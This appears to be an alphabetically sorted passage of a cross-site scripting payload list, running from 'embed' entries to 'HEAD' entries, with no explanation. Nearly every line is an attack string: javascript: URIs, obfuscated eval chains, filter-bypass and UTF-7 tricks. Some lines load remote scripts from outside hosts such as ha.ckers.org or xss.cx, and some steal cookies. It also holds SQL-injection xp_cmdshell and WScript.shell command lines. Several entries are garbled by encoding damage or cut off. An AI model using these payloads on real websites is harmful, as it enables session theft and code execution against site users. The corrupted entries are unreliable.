<embed code=%(scriptlet)s></embed>
<embed name=a flashvars=’autoplay=true&file=”})\”)-(alert=alert(1)))}catch(e){}//’ allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
<embed name=’alert(1)-’ allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
<embed onfocus=’popup=1;’><img
<embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>
<embed src=/aaa>
<embed src=”data:image/svg+xml;>
<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
<embed src=”data:text/html;base64,%(base64)s”>
<embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
<embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></embed>
<embed src=data:textml;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<embed src=evil.swf allowscriptaccess=always>
<embed/src=//goo.gl/nlX0P>
<embed/src=��//goo.gl/nlX0P��>
<Embed / src = // goo.gl/nlX0P>
<EMBED SRC=”http://3w.org/XSS/xss.swf" ></EMBED>
<embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
<embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<EMBED SRC=”http://hacker.com/xss.swf" AllowScriptAccess=”always”>
<;EMBED SRC=”;http://ha.ckers.org/xss.swf"; AllowScriptAccess=”;always”;>;<;/EMBED>;
<EMBED SRC=”http://ha.ckers.org/xss.swf" AllowScriptAccess=”always”></EMBED>
<EMBED SRC=”http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>
<EMBED SRC=”http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=”never” and allownetworking=”internal” it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf”AllowScriptAccess=”always”></EMBED>
EMBED SRC=”http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=”never” and allownetworking=”internal” it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf” AllowScriptAccess=”always”></EMBED>
<embed src=https://evil/>
<embed src=”javascript:alert(1)”>
<embed src=javascript:alert(1)> *
<embed src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<embed src=javascript:alert(162)>
<embed src=”javascript:alert(1)”></embed>
<embed src=”javascript:alert(1)”></embed> // Firefox only
<embed src=”javascript:alert(1)”></embed> // O10.10, OM10.0, GC6, FF
<embed src=%(jscript)s></embed>
?embed src=”lol.swf” width=”1337" height=”1337" FlashVars=”param=something&param2=somethingelse&param3=lol”?
<embed src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
<embed src=URL onload=alert(‘xss’)>
<embed src=/x//alert(1)><base href=”javascript:\
<embed type=”image” src=%(scriptlet)s></embed>
<embed width=500 height=500 code=”data:text/html,<script>%(payload)s</script>”>
<embed width=500 height=500 code=”data:text/html,<script>%(payload)s</script>”></embed>
Ember.run(null, alert, 9)
e.name = ‘c’;
encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)
encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)
encodeURIComponent(&#039;userinput&#039;)
encodeURIComponent (‘userinput’)
<![endif] →
“;escape=eval;//
e.type = ‘hidden’;
eval(0+location.string) //or 1+location.string
eval(0x258da033.toString(30))(1)
eval(“1+1?>”);eval(“1+1</script>”);eval(“1+1//?>”);
eval(1558153217..toString(36))(1)
eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
eval(630038579..toString(30))(1)
eval(a+b+c+d);
eval(“ale” + (!![]+[])[+!+[]]+(!![]+[])[+[]])(1)
eval(‘ale’+’rt(0)’);
eval(`${`${`${`${`${`a`}`}`}`}`}${`${`${`${`${`l`}`}`}`}`}${`${`${`${`${`e`}`}`}`}`}${`${`${`${`${`r`}`}`}`}`}${`${`${`${`${`t`}`}`}`}`}${`${`${`${`${`(1)`}`}`}`}`}`)
eval(`ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(1)`);
eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));
eval.call(this,unescape.call(this,location))
eval(Dec(‘203041263543203’,’2549'));
eval(document.referrer.slice(10));
eval(JSON.stringify({a:1},null,’alert(1)//’))
eval(location.hash.slice(1));
eval(location.hash.slice(1))//
eval(location.hash.slice(1))
eval(location.hash.slice(1)>#alert(1)
“);eval(name+”
“+eval(name)+”
eval(name)
eval+name
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))
eval(String.raw({[`raw`]:`aet(1)`},…`lr`))
eval(String.raw({raw:’aet(1)’},’l’,’r’))
eval(Symbol(‘)-alert(1’).toString())
eval(‘this.a;alert(1);//=”bbb”;’)
eval(‘this.a=”bbb”;alert(1);//”’)
$eval((toString()).constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)) }}
eval(‘\\u’+’0061'+’lert(1)’)
_=eval,__=unescape,___=document.URL,_(__(___))
“;eval(unescape(location))//# %0Aalert(0)
“;eval(unescape(location))//#%0Aprompt(0)
%”;eval(unescape(location))//#%0Aprompt(0)
eval(URL.slice(-8))>#alert(1)
eval(“\x61\x6c\x65\x72\x74\x28\x31\x29a?)
Event.prototype[0]=’@garethheyes’,Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert
Event.prototype[0]=’@garethheyes’,Event.prototype.length=1;Event.prototype.toString=[].join;onload=confirm
Event.prototype.toString=[].join;Event.prototype.length=1;Event.prototype[0]=1;onhashchange=alert;onmessage=alert;
<event-source src=”%(event)s” onload=”javascript:alert(1)”>
evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7 evil](cod)
‘;exec%20master..xp_cmdshell%20’dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’ — &&
<! — #exec cmd=”/bin/echo ‘<SCR’” →<! — #exec cmd=”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<! — #exec cmd=”/bin/echo ‘<SCR’” →<! — #exec cmd=”/bin/echo ‘IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
<! — #exec cmd=”/bin/echo ‘<SCRIPT
<;! — #exec cmd=”;/bin/echo ‘;<;SCRIPT SRC’;”; →;<;! — #exec cmd=”;/bin/echo ‘;=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
<! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xss.cx/xss.js></SCRIPT>'"-->
<! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xss.ha.ckers.org/a.js></SCRIPT>;'"-->
<! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xxxx.com/xss.js></SCRIPT>'"-->
execScript()
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
$ exiftool -Artist=’”><img src=1 onerror=alert(1)>’ FILENAME.jpeg
exiftool -Artist= ><img src=1 onerror=alert(document.domain)> brute.jpeg
‘,expanded:’\x2F’},function(file){path = file;document.getElementById(“pathbox”).value = path;});prompt(document.location);$(‘#fileTreeDemo_1’).fileTree({script:’../../administrator/ajaxtree/jqueryFileTree.cfm?type=dir
exp/*<A STYLE_NeatHtmlReplace=’no\xss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’
exp/*<A STYLE=’no\xss:noxss(“*//*”);
exp/*<A STYLE=’no\xss:noxss(“**”);
exp/*<A STYLE=’no\xss:noxss(“*//*”); xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’>
exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’>
exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(document.vulnerable=true)’>
exp/*&lt;A STYLE=’no\xss&#58;noxss(\”*//*\”);
exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
exppression(alert(“XSS”))’>
expr\65ssion(alert(1))
expression(alert(‘XSS’));
expressionG/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
expression(open(alert(1)))
expression:/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
expression <style>*{font-family:’Serif}’;x[value=expression(alert(URL=1));]{color:red}</style>
exp/*<;XSS STYLE=’;no\xss:noxss(“;*//*”;);
exp/*<XSS ?STYLE=’no\xss:noxss(“*//*”); ?
exp/*<XSS STYLE=’no\xss:noxss(“*//*”);
exp/*<XSS STYLE=’no\xss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’>
ExternalInterface.call(“console.log”,q);
ExternalInterface.call(“document.write”,”<script>confirm(1)</script>”);
ExternalInterface.call(“eval”,”myWindow=window.open(‘’,’’,’width=200,height=100'); myWindow.document.write(\”<html><head><script src=\’http://xss.cx/xss.js\'></script></head><body>hi</body></html>\");myWindow.focus()");
ExternalInterface.call(“setTimeout”, ExternalInterface.objectID + ‘_event’ + “(‘“ + eventName + “‘,” + eventValues + “)”, 0);
external.NavigateAndFind(‘ ‘,[],[])
external.NavigateAndFind(‘http://xss.cx',[],[])
extra1 <tag extra2 handler=code> extra3
extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
extra1 <tag spacer1 handler spacer3 = spacer4 code spacer5 extra2> extra3 (without spacer2)
F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E
( false + ���� )[1] = ��a��
false + ���� = ��false��
[F,A,L,S,E, T,R,U,E] = [!!0] + !0;
[F,A,L,S,E, T,R,U,E] = [!!0] + !0;A+L+E+R+T;
[F,B,Z,S,J, O,W,U,E] = [!!0] + !0;
[F,B,Z,S,J, O,W,U,E] = [!!0] + !0;B+Z+J+W+O;
[F,B,Z,S,J,O,W,U,E] = [!!0] + !0;eval(eval(“window.B+Z+window.J+window.W+O+’(0b10100111001??_�V)
f=document.createElement(iframe);
fetch(‘//0’).then(function(r){r.text().then(function(w){write(w)})})
f=’file=akismet/index.php’
Filename=”<<script>alert(‘xss’)<! — a →a.jpg”
[][`filter`][`constructor`](`ale`.concat(`rt\x28`.concat`0\x29`))();//
[].filter.constructor(‘ale’+’rt(4)’)();
Firefox clipboard-hijack without script and css : http://<img alt=”evil/#” width=0 height=0 >
Firefox cookie xss: with(document)cookie=’???��???��?????��????????��??????��?’,write(cookie);
FireFox: this[Object[“keys”](this)[5]](1)
firefoxurl:test|”%20-new-window%20javascript:alert(\’Cross%2520Browser%2520Scripting!\’);”
Firefox (\x09, \x0a, \x0d, \x20)
five={{insert(me._nodes.0.scriptprop)}}
flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
flash.external.ExternalInterface.call(alert, XSS);
flash.external.ExternalInterface.call(eval, cmd);
flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);
flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”)
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
fo.appendChild(i);
fo = document.createElement(form);
fo.elements[0].value=follow;
?FollowSite=0&SiteName=’-confirm(document.domain)-’
font-family:a/**/ression(alert(1))(‘\’)exp\’)
font-family:expression(alert)(1)

“><font size=70 color=red>
<font style=’color:expression(alert(1))’>
<font style=’color:expression(alert(document.cookie))’>
</font>/<svg><style>{src&#x3A;’<style/onload=this.onload=confirm(1)>’</font>/</style>
foo%00<script>alert(document.cookie)</script>
foo\; alert(document.cookie);//;
foo\��; alert(document.cookie);//��;
?foobar=<script>if
foo\i; alert(document.cookie);//i;
<! foo=”[[[Inception]]”><x foo=”]foo><script>alert(1)</script>”>
<! foo=”[[[Inception]]”><x foo=”]foo><script>javascript:alert(1)</script>”>
<! foo=”><script>alert(1)</script>”>
<? foo=”><script>alert(1)</script>”>
</ foo=”><script>alert(1)</script>”>
foo<script>alert(1)</script>
foo<script>alert(document.cookie)</script>
foo<script>alert(/Xss-By-Muhaddi/)</script>
foo<script>alert(/Xss/)</script>
<? foo=”><script>confirm(1)</script>”>
<! foo=”><script>javascript:alert(1)</script>”>
<? foo=”><script>javascript:alert(1)</script>”>
</ foo=”><script>javascript:alert(1)</script>”>
“<foo>” + value + “</foo>”
<! ‘=”foo”><x foo=’><img src=x onerror=alert(2)//’>
<!’=”foo”><x foo=’><img src=x onerror=alert(2)//’>
<?’=”foo”><x foo=’><img src=x onerror=alert(2)//’>
<? ‘=”foo”><x foo=’><img src=x onerror=alert(3)//’>
<% foo><x foo=”%><script>alert(123)</script>”>
<? foo=”><x foo=’?><script>alert(1)</script>’>”>
<% foo><x foo=”%><script>alert(1)</script>”>
<? foo=”><x foo=’?><script>javascript:alert(1)</script>’>”>
<% foo><x foo=”%><script>javascript:alert(1)</script>”>
<! foo=”[[[x]]”><x foo=”]foo><script>alert(1)</script>”>
for(;D<15;)C+=!d[D+=4]
for(;D<19;)C+=!d[D+=4]
<foreignObject xlink:href=”data:text/xml,%3Cscript xmlns=’http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
<foreignObject xlink:href=”javascript:alert(1)”/>
for(i=0; i<targets.length; i++){
for(i=10;i>1;i — )confirm(i);new ActiveXObject(“WScript.shell”).Run(‘calc.exe’,1,true);
for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?]
for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))(
for(i in n={????????????????:”constructor”})[][?=n[i]][?]
for(i in n={????????????????:”constructor”})[][?=n[i]][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
for((i)in(self))eval(i)(1)
for(location of [‘javascript:alert(/ff/)’]);
<formaction=&#039;data:text&sol;html
<formaction=&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;><button>CLICK
<formaction=&#039;data:text&sol;html,<script>alert(1)&lt/script&gt&#039;><button>CLICK
<form/action=’data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt’><button>CLICK
<formaction=’data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt’><button>CLICK
<form/action=’data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt’><button>CLICK // Mario
<form action=’data:text&sol;html,&lt;script&gt;confirm(1)&lt/script&gt’><button>CLICK
<form action=”http://brutelogic.com.br/chall/minified.php" method=”POST” enctype=”multipart/form-data”>
<form action=http://brutelogic.com.br/chall/minified.php method=POST enctype=multipart/form-data>
<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)><button/type=submit>
<form action=javascript:alert(165)><input type=submit>
<form action=javascript:alert(1)><input type=submit>
<form action=javascript:alert(1)><input type=submit>
<form action=”Javascript:alert(1)”><input type=submit>
<form action=”Javascript:alert(1)”><input type=submit> // Firefox, IE
<form/action=javascript:alert(22)><input/type=submit>
formaction=javascript&colon;alert(21)>M
<form/action=javascript&#x0003A;eval(setTimeout(confirm(1)))><input/type=submit>
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=’submit’>//
//<form/action=javascript&#x3A;confirm&lpar;document&period;cookie&rpar;><input/type=’submit’>//
<form action=”javas&Tab;cript:confirm(1)” method=”get”><input type=”submit” value=”Submit”></form>
<form action=’java&Tab;scri&Tab;pt:confirm(1)’><button>CLICK
form.action = ‘<?php echo $url; ?>’
<form><a href=”javascript:\u0061lert(1)”>X
<form><a href=”javascript:\u0061lert&#x28;1&#x29;”>X
<form><a href=”javascript:\u0061lert&#x28;1&#x29;”>X</script><img/*/src=”worksinchrome&colon;prompt&#x28;1&#x29;”/*/onerror=’eval(src)’>
form.appendChild(e);
<form><button
<form><button formaction=”javascript:alert(123)”>crosssitespt
<form><button formaction=javascript:alert(167)>click
<form><button formaction=javascript:alert(1)>click
<form><button formaction=javascript:alert(1)>click
<form><button formaction=”javascript:alert(1)”>//INJECTX
<form><button formaction=”javascript:alert(73)%%0D3C! —
<form><button formaction=”javascript:alert(XSS)”>lol
<form><button formaction=javascript&colon;alert(1)>CLICKME
<form><button formaction=javascript&colon;alert(1)>CLICKME
<Form> <button formaction = javascript & colon; alert (1)> CLICKME
<form><button formaction=javascript&colon;alert(1)>M
<form><button formaction=javascript&colon;confirm(1)>CLICKME
<form><button formaction=”javascript:javascript:alert(1)”>X
form = document.createElement(‘form’);
<form formaction=popup=1; onclick=popup=1;><object>
<form href=’x’onclick=popup=1;><select>
form.id = ‘form_xss’;
<form id=”myform” value=”” action=javascript&Tab;:eval(document.getElementById(‘myform’).elements[0].value)><textarea>confirm(1)</textarea><input type=”submit” value=”Absenden”></form>
<form id=”test” /><button form=”test” formaction=”javascript:alert(123)”>TESTHTML5FORMACTION
<form id=”test” /><button form=”test” formaction=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”>X
<form id=”test” /><button form=”test” formaction=”javascript:javascript:alert(1)”>X
<form id=”test”></form><button form=”test” formaction=”javascript:alert(1)”>X</button>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<form><iframe &#09;&#10;&#11; src=”javascript&#58;alert(1)”&#11;&#10;&#09;;>
<form><iframe &#09;&#10;&#11; src=”javascript&#58;confirm(1)”&#11;&#10;&#09;;>
<form><iframe src=”javascript:alert(1)” ;>
<form><input formaction=javascript:alert(168) type=submit value=click>
<form><input formaction=javascript:alert(169) type=image value=click>
<form><input formaction=javascript:alert(170) type=image src=SOURCE>
<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=submit value=click>
?</form><input type=”date” onfocus=”alert(1)”>
<form><input type=”image” value=”submit” formaction=//goo.gl/nlX0P>
<form><input type=submit formaction=//xss.cx><textarea name=x>
<form><isindex formaction=”javascript&colon;confirm(1)”
<form><isindex formaction=”java&Tab;s&NewLine&cript&colon;confirm(1)”>
form.method=’POST’;
<form method=post action=”//brutelogic.com.br/tests/comments.php”
<form method=post onclick=elements[0].value=outerHTML;submit()>
<form name=location >
<form oninput=alert(1)></input></form>
<form oninput=”alert(1)”><input type=”range”
<form onsubmit=alert(105)><input type=submit>
<form onsubmit=alert(1)><input type=submit>
<form onsubmit=alert(23)><button>M
form.target = ‘frame_xss’;
<form><textarea &#13; onkeyup=’\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;’>
<form><textarea onkeyup=’\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;’>
for(n in{constructor:0})[][?=n][?](/alert(1)/.source)()
for([]o\u{66}!\u{61}\u{6c}\u{65}\u{72}\u{74}`1`)\u{66}
For([]o\u{66}!\u{61}\u{6c}\u{65}\u{72}\u{74}`1`)\u{66}
fo.setAttribute(action, profile.php?id=100);
fo.setAttribute(method, post);
fo.setAttribute(target, myFrame);
fo.submit();
four=”{{set(‘insert’,me.root.ownerbody.appendChild)}}”
frame = document.createElement(‘iframe’);
frame.name=’frame_xss’;
<FRAMESET><FRAME id=XSS SRC=”javascript:alert(‘XSS’);”></FRAMESET>
<FRAMESET><FRAME id=XSS SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
<FRAMESET><FRAME RC=””+”javascript:confirm(5);”></FRAMESET>
<FRAMESET><FRAME SRC=”javascript:alert(1);”></FRAMESET>
<FRAMESET><FRAME src=javascript:alert(‘XpSS’)></FRAME></FRAMESET>
<FRAMESET><FRAME SRC=javascript:alert(‘XSS’)></FRAME></FRAMESET>
<;FRAMESET>;<;FRAME SRC=”;javascript:alert(‘;XSS’;);”;>;<;/FRAMESET>;
<FRAMESET><FRAME ?SRC=”javascript:alert(‘XSS’) ?;”></FRAMESET>
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
<FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
<FRAMESET><FRAME SRC=”javascript:confirm(5);”></FRAMESET>
<FRAMESET><FRAME SRC=”javascript:document.vulnerable=true;”></frameset>
<FRAMESET><FRAME SRC=”javascript:javascript:alert(1);”></FRAMESET>
<frameset><frame src onload=alert(1)>
<frameset><frame/src=//xss.cx>
<frameset><frame src=”xss”></frameset>
<frameset id=”x”onload=popup=1;>
<frameset onBlur frameset onBlur=”javascript:javascript:alert(1)”></frameset onBlur>
<frameset onFocus frameset onFocus=”javascript:javascript:alert(1)”></frameset onFocus>
<frameset onload=alert(1)>
<frameset onload=alert(123)>
<frameset onload=javascript:alert(1)>
<frameset onload=javascript:javascript:alert(1)></frameset>
<frameset onload=popup=1;>
<frameset onpageshow=”alert(1)”>
<frameset/onpageshow=alert(1)>
<frameset onScroll frameset onScroll=”javascript:javascript:alert(1)”></frameset onScroll>
frame.style=’visibility: hidden;’;
fr = document.createElement(iframe);
fr.setAttribute(name, myFrame);
fr.setAttribute(style, display:none);
f.setAttribute(style,display:none);
f.src=//+targets[i]+/PATH/PAGE?PARAM=<script src=//DOMAIN/xss2rce.js>;
\);function%20someFunction(a){}prompt(1)//
Function(‘a=`${alert`’,’`}`){‘)()
Function(‘a=alert``’,’’)()
(function(a){alert(1)}).call()
(function({a,b,c}={a:1,b:2,c:3}){alert(`${a},${b},${c}`)})()
Function(‘a=[class A extends Function(‘,’}]){alert(1)’)()
Function(‘){alert()//’, ‘’)();
function() {alert(1)}
function() {alert(1
Function`$${`a${`l${`e${`r${`t${`(${`1${`)`}`}`}`}`}`}`}`}$```
Function`alert(1)```````````
Function(“ale”+”rt(1)”)();
Function{}(‘alert(1)’)``
(function(){alert(9)})()
Function(“a=`”,”`,xss=1){alert(xss)”)()
functionBody = “with($context){with($data||{}){return{“ +rewrittenBindings + “}}}”;
function(){code}
(function{}).constructor
function document::onreadystatechange(){alert(1);}
(function { eval(‘var a=1’); }); alert(typeof a);
function filter($value) {return preg_replace($this->_expressions, ‘’, $value);
function::[‘location’]=’javascript’’:alert(/FF/)’
!function(lol=alert(1)){}()
Function.prototype.toString=Function.prototype.call;”alert(1)//”.replace(“//”,Function)
Function(‘x=alert`1`’,’y’)()
function xss(why,){}//
f=(x=alert(1))=>{}; f();
f=(x=alert(1))=>{};f();
+g,a=C[A]+C[+!A],A]+a])() [g[A]+g[A+A]+C[E]+a](A)
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,’window’)(),’document’)(), ‘getElementsByTagName’)(‘html’)[0],’innerHTML’)().match(/d.*’/));</script>
gbk chatset:%bb\”alert(1)
Generic Source Breaking
$.get(‘//0’,function(r){write(r)})>
$.getScript(‘//0’)
?getURL,javascript:alert(1)”,
?getURL(javascript:alert(1))”,
#getURL,javascript:alert(1)”,
getURL(“javascript:alert(‘X9SS’)”)
getURL(“javascript:alert(‘XSS’)”)
getURL(“javascript:confirm(document.location)”)
?getURLValue=javascript:alert(1)”,
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
g’”></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
<g onload=��javascript:alert(9)��></g></svg>
Google Chrome Auditor Bypass (up to v51)
?goto=javascript:alert(1)”,
?goto,javascript:alert(1)”,
#goto,javascript:alert(1)”,
&gt;
&gt
&GT;
&GT
<h1><font color=”#00FF00">Ege was here :)</font></h1>
<h1><font color=blue>hellox worldss</h1>
<h1>Hello,<script>alert(1)</script>!</h1>
<h1>Hello, <script>alert(1)</script>!</h1>
“><h1><IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>”>123</h1>
“><h1><IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>123</h1>
><h1><IFRAME width=”420" height=”315" frameborder=”0" onmouseover=”document.location.href=’https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
“><h1><iframe width=”420" height=”315" src=”http://www.youtube.com/embed/sxvccpasgTE" frameborder=”0" allowfullscreen></iframe>123</h1>
“><h1><IFRAME width=”420" height=”315" SRC=”http://www.youtube.com/embed/sxvccpasgTE" frameborder=”0" onmouseover=”alert(document.cookie)”></IFRAME>123</h1>
<h1>INJECTX</h1>
<h1><marquee><b><u><i>XSS</i></u></b></marquee></h1>
<h1 _-_-_-ng_-_-_click=”$event.view.location.replace(‘javascript:alert(1)’)”>XSS</h1>
<h1/onclick=alert(1)>a//INJECTX
><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
��><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
><h1/onclick=a\u006cer\u0074(/xss-by-shawar/)>clickme</h1>
“><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
“><h1 onclick=prompt(1)>Clickme</h1>
“><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style>
<h1/onmouseover=’alert(1)’>renwa
<h1/onmouseover=’alert(1)’>Renwa
><h1 onmouseover=alert(Xss-By-Muhaddi)>Hover Me</h1>
><h1 onmouseover=alert(Xss)>Hover Me</h1>
��><h1 onmouseover=alert(��Xss��)>Hover Me</h1>
“><h1/onmouseover=’\u0061lert(1)’>
[‘<h1>Payload</h1>’,’<script>alert(/HOLA/);</script>’]
“><h2 id=”Iamheading”onmouseover=”confirm(1)”>
<handler id=”y”>alert(1)</handler>
<handler xmlns:ev=”http://www.w3.org/2001/xml-events" ev:event=”load”>alert(1)</handler>
<head><base href=”javascript://”></head><body><a href=”/. /,alert(1)//#”>XXX</a></body>
<head><base href=”javascript://”/></head><body><a href=”/. /,alert(1)//#”>XXX</a></body>
<head><base href=”javascript://”></head><body><a href=”/. /,javascript:alert(1)//#”>XXX</a></body>
head -c 1000000 /dev/urandom
head -c 1000000 /dev/urandom > /tmp/bin.bin
header(‘Refresh: 0;url=javascript:alert(1)’);
header(‘Refresh: 0;url=javascript:confirm(1)’);
<;HEAD>;<;META HTTP-EQUIV=”;CONTENT-TYPE”; CONTENT=”;text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(‘;XSS’;);+ADw-/SCRIPT+AD4-
<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4-
